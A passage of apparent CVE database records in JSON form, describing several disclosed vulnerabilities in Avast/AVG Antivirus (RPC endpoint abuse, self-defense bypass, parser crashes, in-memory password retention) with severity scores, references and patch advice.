}, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to make arbitrary changes to the Components section of the Stats.ini file via RPC from a Low Integrity process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10865", "datePublished": "2020-04-01T17:02:07", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.676Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10868 (GCVE-0-2020-10868)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.613Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to launch the Repair App RPC call from a Low Integrity process." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T17:08:42", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10868", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to launch the Repair App RPC call from a Low Integrity process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10868", "datePublished": "2020-04-01T17:08:42", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.613Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2024-9484 (GCVE-0-2024-9484)
Vulnerability from cvelistv5
- CWE-476 - NULL Pointer Dereference
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-9484", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-04T13:31:38.216327Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-04T13:31:46.193Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "MacOS", "Windows", "Linux" ], "product": "Antivirus", "vendor": "AVG/Avast", "versions": [ { "lessThan": "\u003c 24092400", "status": "affected", "version": "24/Sep/2024", "versionType": "date" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Mike Zhang, an independent security researcher" } ], "datePublic": "2024-10-04T12:44:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "An null-pointer-derefrence in the engine module in AVG/Avast Antivirus signature \u0026lt;24092400 released on 24/Sep/2024 on MacOS allows a malformed xar file to crash the application during file processing." } ], "value": "An null-pointer-derefrence in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed xar file to crash the application during file processing." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-07T11:27:37.651Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Upgrade to the latest version of virus definitions.\u003cbr\u003e" } ], "value": "Upgrade to the latest version of virus definitions." } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.2.0" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2024-9484", "datePublished": "2024-10-04T12:44:25.057Z", "dateReserved": "2024-10-03T14:29:40.798Z", "dateUpdated": "2024-10-07T11:27:37.651Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10860 (GCVE-0-2020-10860)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.672Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. An Arbitrary Memory Address Overwrite vulnerability in the aswAvLog Log Library results in Denial of Service of the Avast Service (AvastSvc.exe)." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T16:49:27", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10860", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. An Arbitrary Memory Address Overwrite vulnerability in the aswAvLog Log Library results in Denial of Service of the Avast Service (AvastSvc.exe)." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10860", "datePublished": "2020-04-01T16:49:27", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.672Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2024-9482 (GCVE-0-2024-9482)
Vulnerability from cvelistv5
- CWE-787 - Out-of-bounds Write
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-9482", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-04T13:39:04.820285Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-04T13:39:14.744Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "MacOS", "Windows", "Linux" ], "product": "Antivirus", "vendor": "AVG/Avast", "versions": [ { "lessThan": "\u003c 24092400", "status": "affected", "version": "24/Sep/2024", "versionType": "date" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "value": "Mike Zhang, an independent security researcher" } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u0026lt;24092400 released on 24/Sep/2024 on MacOS allows a malformed Mach-O file to crash the application during file processing." } ], "value": "An out-of-bounds write in the engine module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS allows a malformed Mach-O file to crash the application during file processing." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "CWE-787 Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-07T11:27:03.261Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Upgrade to the latest version of virus definintions.\u003cbr\u003e" } ], "value": "Upgrade to the latest version of virus definintions." } ], "source": { "discovery": "EXTERNAL" }, "title": "Out of Bounds write on scan of malformed Mach-O file may crash the application", "x_generator": { "engine": "Vulnogram 0.2.0" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2024-9482", "datePublished": "2024-10-04T12:22:47.087Z", "dateReserved": "2024-10-03T14:29:35.415Z", "dateUpdated": "2024-10-07T11:27:03.261Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2021-45335 (GCVE-0-2021-45335)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T04:39:20.495Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Sandbox component in Avast Antivirus prior to 20.4 has an insecure permission which could be abused by local user to control the outcome of scans, and therefore evade detection or delete arbitrary system files." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-12-27T12:29:43", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-45335", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Sandbox component in Avast Antivirus prior to 20.4 has an insecure permission which could be abused by local user to control the outcome of scans, and therefore evade detection or delete arbitrary system files." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0", "refsource": "MISC", "url": "https://www.avast.com/hacker-hall-of-fame/en/researcher-david-eade-reports-antitrack-bug-to-avast-0" }, { "name": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5", "refsource": "MISC", "url": "https://github.com/the-deniss/Vulnerability-Disclosures/tree/main/CVE-2021-AVST3%20%26%20CVE-2021-AVST4%20%26%20CVE-2021-AVST5" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-45335", "datePublished": "2021-12-27T12:29:43", "dateReserved": "2021-12-20T00:00:00", "dateUpdated": "2024-08-04T04:39:20.495Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2024-9483 (GCVE-0-2024-9483)
Vulnerability from cvelistv5
- CWE-476 - NULL Pointer Dereference
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-9483", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-10-04T13:34:56.915713Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-04T13:35:04.810Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "platforms": [ "MacOS", "Windows", "Linux" ], "product": "Antivirus", "vendor": "AVG/Avast", "versions": [ { "lessThan": "\u003c 24092400", "status": "affected", "version": "24/Sep/2024", "versionType": "date" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "value": "Mike Zhang, an independent security researcher" } ], "datePublic": "2024-10-04T12:29:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "A null-pointer-dereference in the signature verification module in AVG/Avast Antivirus signature \u0026lt;24092400 released on 24/Sep/2024 on MacOS may allow a malformed xar file to crash the application during processing." } ], "value": "A null-pointer-dereference in the signature verification module in AVG/Avast Antivirus signature \u003c24092400 released on 24/Sep/2024 on MacOS may allow a malformed xar file to crash the application during processing." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-07T11:27:19.528Z", "orgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "shortName": "NLOK" }, "references": [ { "url": "https://support.norton.com/sp/static/external/tools/security-advisories.html" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Upgrade to the latest version of virus definitions.\u003cbr\u003e" } ], "value": "Upgrade to the latest version of virus definitions." } ], "source": { "discovery": "EXTERNAL" }, "title": "Uninitialized variable in digital signiture verification may crash the application", "x_generator": { "engine": "Vulnogram 0.2.0" } } }, "cveMetadata": { "assignerOrgId": "dbd8429d-f261-4b1e-94cc-ae3132817e2e", "assignerShortName": "NLOK", "cveId": "CVE-2024-9483", "datePublished": "2024-10-04T12:29:16.430Z", "dateReserved": "2024-10-03T14:29:36.984Z", "dateUpdated": "2024-10-07T11:27:19.528Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-10867 (GCVE-0-2020-10867)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
https://forum.avast.com/index.php?topic=232420.0 | x_refsource_MISC | |
https://forum.avast.com/index.php?topic=232423.0 | x_refsource_MISC | |
https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:14:15.616Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to bypass intended access restrictions on tasks from an untrusted process, when Self Defense is enabled." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-04-01T17:06:48", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-10867", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in Avast Antivirus before 20. The aswTask RPC endpoint for the TaskEx library in the Avast Service (AvastSvc.exe) allows attackers to bypass intended access restrictions on tasks from an untrusted process, when Self Defense is enabled." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://forum.avast.com/index.php?topic=232420.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232420.0" }, { "name": "https://forum.avast.com/index.php?topic=232423.0", "refsource": "MISC", "url": "https://forum.avast.com/index.php?topic=232423.0" }, { "name": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md", "refsource": "MISC", "url": "https://github.com/umarfarook882/Avast_Multiple_Vulnerability_Disclosure/blob/master/README.md" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-10867", "datePublished": "2020-04-01T17:06:48", "dateReserved": "2020-03-23T00:00:00", "dateUpdated": "2024-08-04T11:14:15.616Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2020-15024 (GCVE-0-2020-15024)
Vulnerability from cvelistv5
- n/a
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T13:00:52.172Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in the Login Password feature of the Password Manager component in Avast Antivirus 20.1.5069.562. An entered password continues to be stored in Windows main memory after a logout, and after a Lock Vault operation." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-09-10T17:10:42", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2020-15024", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An issue was discovered in the Login Password feature of the Password Manager component in Avast Antivirus 20.1.5069.562. An entered password continues to be stored in Windows main memory after a logout, and after a Lock Vault operation." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/", "refsource": "MISC", "url": "http://nestedif.com/avast-antivirus-password-manager-vulnerability-improper-session-handling-leading-to-information-disclosure-advisory/" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2020-15024", "datePublished": "2020-09-10T17:10:42", "dateReserved": "2020-06-24T00:00:00", "dateUpdated": "2024-08-04T13:00:52.172Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
CVE-2017-8308 (GCVE-0-2017-8308)
Vulnerability from cvelistv5
- n/a
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/98084 | vdb-entry, x_refsource_BID | |
https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T16:34:22.373Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "98084", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/98084" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2017-04-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In Avast Antivirus before v17, an unprivileged user (and thus malware or a virus) can mark an arbitrary process as Trusted from the perspective of the Avast product. This bypasses the Self-Defense feature of the product, opening a door to subsequent attack on many of its components." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-05-01T09:57:02", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "98084", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/98084" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2017-8308", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Avast Antivirus before v17, an unprivileged user (and thus malware or a virus) can mark an arbitrary process as Trusted from the perspective of the Avast product. This bypasses the Self-Defense feature of the product, opening a door to subsequent attack on many of its components." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "98084", "refsource": "BID", "url": "http://www.securityfocus.com/bid/98084" }, { "name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201", "refsource": "MISC", "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/Multiple-Vulnerabilities-in-Avast-Antivirus/?fid=9201" } ] } } } }, 